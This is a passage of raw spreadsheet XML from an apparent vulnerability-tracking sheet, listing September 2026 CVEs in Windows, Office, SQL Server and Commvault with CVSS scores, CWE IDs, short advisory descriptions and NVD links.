t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72933</t></is></c></row><row r="193"><c r="A193" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B193" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C193" s="5" t="inlineStr"><is><t>CVE-2026-72940</t></is></c><c r="D193" s="5" t="n"><v>8.800000000000001</v></c><c r="E193" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F193" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G193" s="5" t="inlineStr" /><c r="H193" s="5" t="n"><v>0.008</v></c><c r="I193" s="5" t="inlineStr" /><c r="J193" s="5" t="inlineStr" /><c r="K193" s="5" t="inlineStr" /><c r="L193" s="5" t="inlineStr" /><c r="M193" s="5" t="inlineStr" /><c r="N193" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O193" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P193" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q193" s="5" t="inlineStr" /><c r="R193" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S193" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Schannel allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T193" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72940</t></is></c></row><row r="194"><c r="A194" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B194" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C194" s="5" t="inlineStr"><is><t>CVE-2026-72950</t></is></c><c r="D194" s="5" t="n"><v>8.800000000000001</v></c><c r="E194" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F194" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G194" s="5" t="inlineStr" /><c r="H194" s="5" t="n"><v>0.008999999999999999</v></c><c r="I194" s="5" t="inlineStr" /><c r="J194" s="5" t="inlineStr" /><c r="K194" s="5" t="inlineStr" /><c r="L194" s="5" t="inlineStr" /><c r="M194" s="5" t="inlineStr" /><c r="N194" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O194" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P194" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q194" s="5" t="inlineStr" /><c r="R194" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S194" s="5" t="inlineStr"><is><t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t></is></c><c r="T194" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72950</t></is></c></row><row r="195"><c r="A195" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B195" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C195" s="5" t="inlineStr"><is><t>CVE-2026-72959</t></is></c><c r="D195" s="5" t="n"><v>8.800000000000001</v></c><c r="E195" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F195" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G195" s="5" t="inlineStr" /><c r="H195" s="5" t="n"><v>0.008999999999999999</v></c><c r="I195" s="5" t="inlineStr" /><c r="J195" s="5" t="inlineStr" /><c r="K195" s="5" t="inlineStr" /><c r="L195" s="5" t="inlineStr" /><c r="M195" s="5" t="inlineStr" /><c r="N195" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O195" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P195" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q195" s="5" t="inlineStr" /><c r="R195" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S195" s="5" t="inlineStr"><is><t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t></is></c><c r="T195" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72959</t></is></c></row><row r="196"><c r="A196" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B196" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C196" s="5" t="inlineStr"><is><t>CVE-2026-72960</t></is></c><c r="D196" s="5" t="n"><v>8.800000000000001</v></c><c r="E196" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F196" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G196" s="5" t="inlineStr" /><c r="H196" s="5" t="n"><v>0.008</v></c><c r="I196" s="5" t="inlineStr" /><c r="J196" s="5" t="inlineStr" /><c r="K196" s="5" t="inlineStr" /><c r="L196" s="5" t="inlineStr" /><c r="M196" s="5" t="inlineStr" /><c r="N196" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O196" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P196" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q196" s="5" t="inlineStr" /><c r="R196" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S196" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Media Player allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T196" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72960</t></is></c></row><row r="197"><c r="A197" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B197" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C197" s="5" t="inlineStr"><is><t>CVE-2026-72972</t></is></c><c r="D197" s="5" t="n"><v>8.800000000000001</v></c><c r="E197" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F197" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G197" s="5" t="inlineStr" /><c r="H197" s="5" t="n"><v>0.008</v></c><c r="I197" s="5" t="inlineStr" /><c r="J197" s="5" t="inlineStr" /><c r="K197" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L197" s="5" t="inlineStr" /><c r="M197" s="5" t="inlineStr" /><c r="N197" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O197" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P197" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q197" s="5" t="inlineStr" /><c r="R197" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S197" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T197" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72972</t></is></c></row><row r="198"><c r="A198" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B198" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C198" s="5" t="inlineStr"><is><t>CVE-2026-72973</t></is></c><c r="D198" s="5" t="n"><v>8.800000000000001</v></c><c r="E198" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F198" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G198" s="5" t="inlineStr" /><c r="H198" s="5" t="n"><v>0.008</v></c><c r="I198" s="5" t="inlineStr" /><c r="J198" s="5" t="inlineStr" /><c r="K198" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L198" s="5" t="inlineStr" /><c r="M198" s="5" t="inlineStr" /><c r="N198" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O198" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P198" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q198" s="5" t="inlineStr" /><c r="R198" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S198" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T198" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72973</t></is></c></row><row r="199"><c r="A199" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B199" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C199" s="5" t="inlineStr"><is><t>CVE-2026-72986</t></is></c><c r="D199" s="5" t="n"><v>8.800000000000001</v></c><c r="E199" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F199" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G199" s="5" t="inlineStr" /><c r="H199" s="5" t="n"><v>0.008</v></c><c r="I199" s="5" t="inlineStr" /><c r="J199" s="5" t="inlineStr" /><c r="K199" s="5" t="inlineStr" /><c r="L199" s="5" t="inlineStr" /><c r="M199" s="5" t="inlineStr" /><c r="N199" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O199" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P199" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q199" s="5" t="inlineStr" /><c r="R199" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S199" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Graphic Fonts allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T199" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72986</t></is></c></row><row r="200"><c r="A200" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B200" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C200" s="5" t="inlineStr"><is><t>CVE-2026-73006</t></is></c><c r="D200" s="5" t="n"><v>8.800000000000001</v></c><c r="E200" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F200" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G200" s="5" t="inlineStr" /><c r="H200" s="5" t="n"><v>0.008</v></c><c r="I200" s="5" t="inlineStr" /><c r="J200" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K2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200" s="5" t="inlineStr" /><c r="M200" s="5" t="inlineStr" /><c r="N200" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O200" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P200" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q200" s="5" t="inlineStr" /><c r="R200" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S200" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T200" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73006</t></is></c></row><row r="201"><c r="A201" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B201" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C201" s="5" t="inlineStr"><is><t>CVE-2026-73012</t></is></c><c r="D201" s="5" t="n"><v>8.800000000000001</v></c><c r="E201" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F201" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G201" s="5" t="inlineStr" /><c r="H201" s="5" t="n"><v>0.006</v></c><c r="I201" s="5" t="inlineStr" /><c r="J201" s="5" t="inlineStr" /><c r="K201" s="5" t="inlineStr" /><c r="L201" s="5" t="inlineStr" /><c r="M201" s="5" t="inlineStr" /><c r="N201" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O201" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P201" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q201" s="5" t="inlineStr" /><c r="R201" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S201" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Management Services allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T201" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73012</t></is></c></row><row r="202"><c r="A202" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B202" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C202" s="5" t="inlineStr"><is><t>CVE-2026-73013</t></is></c><c r="D202" s="5" t="n"><v>8.800000000000001</v></c><c r="E202" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F202" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G202" s="5" t="inlineStr" /><c r="H202" s="5" t="n"><v>0.006</v></c><c r="I202" s="5" t="inlineStr" /><c r="J202" s="5" t="inlineStr" /><c r="K202" s="5" t="inlineStr" /><c r="L202" s="5" t="inlineStr" /><c r="M202" s="5" t="inlineStr" /><c r="N202" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O202" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P202" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q202" s="5" t="inlineStr" /><c r="R202" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S202" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T202" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73013</t></is></c></row><row r="203"><c r="A203" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B203" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C203" s="5" t="inlineStr"><is><t>CVE-2026-73016</t></is></c><c r="D203" s="5" t="n"><v>8.800000000000001</v></c><c r="E203" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F203" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G203" s="5" t="inlineStr" /><c r="H203" s="5" t="n"><v>0.006</v></c><c r="I203" s="5" t="inlineStr" /><c r="J203" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K2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03" s="5" t="inlineStr" /><c r="M203" s="5" t="inlineStr" /><c r="N203" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O203" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P203" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q203" s="5" t="inlineStr" /><c r="R203" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S203" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T203" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73016</t></is></c></row><row r="204"><c r="A204" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B204" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C204" s="5" t="inlineStr"><is><t>CVE-2026-73018</t></is></c><c r="D204" s="5" t="n"><v>8.800000000000001</v></c><c r="E204" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F204" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G204" s="5" t="inlineStr" /><c r="H204" s="5" t="n"><v>0.008</v></c><c r="I204" s="5" t="inlineStr" /><c r="J204" s="5" t="inlineStr" /><c r="K204" s="5" t="inlineStr" /><c r="L204" s="5" t="inlineStr" /><c r="M204" s="5" t="inlineStr" /><c r="N204" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O204" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P204" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q204" s="5" t="inlineStr" /><c r="R204" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S204" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Graphic Fonts allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T204" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73018</t></is></c></row><row r="205"><c r="A205" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B205" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C205" s="5" t="inlineStr"><is><t>CVE-2026-73023</t></is></c><c r="D205" s="5" t="n"><v>8.800000000000001</v></c><c r="E205" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F205" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G205" s="5" t="inlineStr" /><c r="H205" s="5" t="n"><v>0.006</v></c><c r="I205" s="5" t="inlineStr" /><c r="J205" s="5" t="inlineStr" /><c r="K205" s="5" t="inlineStr" /><c r="L205" s="5" t="inlineStr" /><c r="M205" s="5" t="inlineStr" /><c r="N205" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O205" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P205" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q205" s="5" t="inlineStr" /><c r="R205" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S205" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T205" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73023</t></is></c></row><row r="206"><c r="A206" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B206" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C206" s="5" t="inlineStr"><is><t>CVE-2026-73028</t></is></c><c r="D206" s="5" t="n"><v>8.800000000000001</v></c><c r="E206" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F206" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G206" s="5" t="inlineStr" /><c r="H206" s="5" t="n"><v>0.005</v></c><c r="I206" s="5" t="inlineStr" /><c r="J206" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K206" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L206" s="5" t="inlineStr" /><c r="M206" s="5" t="inlineStr" /><c r="N206" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O206" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P206" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q206" s="5" t="inlineStr" /><c r="R206" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S206" s="5" t="inlineStr"><is><t>Improper access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T206" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73028</t></is></c></row><row r="207"><c r="A207" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B207" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C207" s="5" t="inlineStr"><is><t>CVE-2026-77105</t></is></c><c r="D207" s="5" t="n"><v>8.800000000000001</v></c><c r="E207" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F207" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G207" s="5" t="inlineStr" /><c r="H207" s="5" t="n"><v>0.002</v></c><c r="I207" s="5" t="inlineStr" /><c r="J207" s="5" t="inlineStr" /><c r="K207" s="5" t="inlineStr"><is><t>commvault:commvault, linux:linux_kernel, microsoft:windows</t></is></c><c r="L207" s="5" t="inlineStr" /><c r="M207" s="5" t="inlineStr" /><c r="N207" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O207" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P207" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q207" s="5" t="inlineStr" /><c r="R207" s="5" t="inlineStr"><is><t>CWE-347</t></is></c><c r="S207" s="5" t="inlineStr"><is><t>CommServe contained a cryptographic signature verification issue affecting privilege management. Software customers upgrade to resolved maintenance release. Update CommServe and Web Server.</t></is></c><c r="T207" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77105</t></is></c></row><row r="208"><c r="A208" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B208" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C208" s="5" t="inlineStr"><is><t>CVE-2026-77106</t></is></c><c r="D208" s="5" t="n"><v>8.800000000000001</v></c><c r="E208" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F208" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G208" s="5" t="inlineStr" /><c r="H208" s="5" t="n"><v>0.003</v></c><c r="I208" s="5" t="inlineStr" /><c r="J208" s="5" t="inlineStr" /><c r="K208" s="5" t="inlineStr"><is><t>commvault:commvault</t></is></c><c r="L208" s="5" t="inlineStr" /><c r="M208" s="5" t="inlineStr" /><c r="N208" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O208" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P208" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q208" s="5" t="inlineStr" /><c r="R208" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S208" s="5" t="inlineStr"><is><t>Cvlaunchd contained a missing authorization issue affecting command execution authorization. Software customers upgrade to resolved maintenance release. Update all Commvault installations, including Commserve, Webserver, Command Center, Media Agents, Clients and HyperScale X.</t></is></c><c r="T208" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77106</t></is></c></row><row r="209"><c r="A209" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B209" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C209" s="5" t="inlineStr"><is><t>CVE-2026-77480</t></is></c><c r="D209" s="5" t="n"><v>8.800000000000001</v></c><c r="E209" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F209" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G209" s="5" t="inlineStr" /><c r="H209" s="5" t="n"><v>0.005</v></c><c r="I209" s="5" t="inlineStr" /><c r="J209" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K209" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L209" s="5" t="inlineStr" /><c r="M209" s="5" t="inlineStr" /><c r="N209" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O209" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P209" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q209" s="5" t="inlineStr" /><c r="R209" s="5" t="inlineStr"><is><t>CWE-1220</t></is></c><c r="S209" s="5" t="inlineStr"><is><t>Insufficient granularity of access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T209" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77480</t></is></c></row><row r="210"><c r="A210" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B210" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C210" s="5" t="inlineStr"><is><t>CVE-2026-77481</t></is></c><c r="D210" s="5" t="n"><v>8.800000000000001</v></c><c r="E210" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F210" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G210" s="5" t="inlineStr" /><c r="H210" s="5" t="n"><v>0.006</v></c><c r="I210" s="5" t="inlineStr" /><c r="J210" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K210" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L210" s="5" t="inlineStr" /><c r="M210" s="5" t="inlineStr" /><c r="N210" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O210" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P210" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q210" s="5" t="inlineStr" /><c r="R210" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S210" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T210" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77481</t></is></c></row><row r="211"><c r="A211" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B211" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C211" s="5" t="inlineStr"><is><t>CVE-2026-77482</t></is></c><c r="D211" s="5" t="n"><v>8.800000000000001</v></c><c r="E211" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F211" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G211" s="5" t="inlineStr" /><c r="H211" s="5" t="n"><v>0.008</v></c><c r="I211" s="5" t="inlineStr" /><c r="J211" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K211" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019</t></is></c><c r="L211" s="5" t="inlineStr" /><c r="M211" s="5" t="inlineStr" /><c r="N211" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O211" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P211" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q211" s="5" t="inlineStr" /><c r="R211" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S211" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T211" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77482</t></is></c></row><row r="212"><c r="A212" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B212" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C212" s="5" t="inlineStr"><is><t>CVE-2026-77483</t></is></c><c r="D212" s="5" t="n"><v>8.800000000000001</v></c><c r="E212" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F212" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G212" s="5" t="inlineStr" /><c r="H212" s="5" t="n"><v>0.005</v></c><c r="I212" s="5" t="inlineStr" /><c r="J212" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K212" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L212" s="5" t="inlineStr" /><c r="M212" s="5" t="inlineStr" /><c r="N212" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O212" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P212" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q212" s="5" t="inlineStr" /><c r="R212" s="5" t="inlineStr"><is><t>CWE-1390</t></is></c><c r="S212" s="5" t="inlineStr"><is><t>Weak authentication in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T212" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77483</t></is></c></row><row r="213"><c r="A213" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B213" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C213" s="5" t="inlineStr"><is><t>CVE-2026-77484</t></is></c><c r="D213" s="5" t="n"><v>8.800000000000001</v></c><c r="E213" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F213" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G213" s="5" t="inlineStr" /><c r="H213" s="5" t="n"><v>0.011</v></c><c r="I213" s="5" t="inlineStr" /><c r="J213" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K213" s="5" t="inlineStr"><is><t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L213" s="5" t="inlineStr" /><c r="M213" s="5" t="inlineStr" /><c r="N213" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O213" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P213" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q213" s="5" t="inlineStr" /><c r="R213" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S213" s="5" t="inlineStr"><is><t>Deserialization of untrusted data in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T213" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77484</t></is></c></row><row r="214"><c r="A214" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B214" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C214" s="5" t="inlineStr"><is><t>CVE-2026-77486</t></is></c><c r="D214" s="5" t="n"><v>8.800000000000001</v></c><c r="E214" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F214" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G214" s="5" t="inlineStr" /><c r="H214" s="5" t="n"><v>0.005</v></c><c r="I214" s="5" t="inlineStr" /><c r="J214" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K214" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019</t></is></c><c r="L214" s="5" t="inlineStr" /><c r="M214" s="5" t="inlineStr" /><c r="N214" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O214" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P214" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q214" s="5" t="inlineStr" /><c r="R214" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S214" s="5" 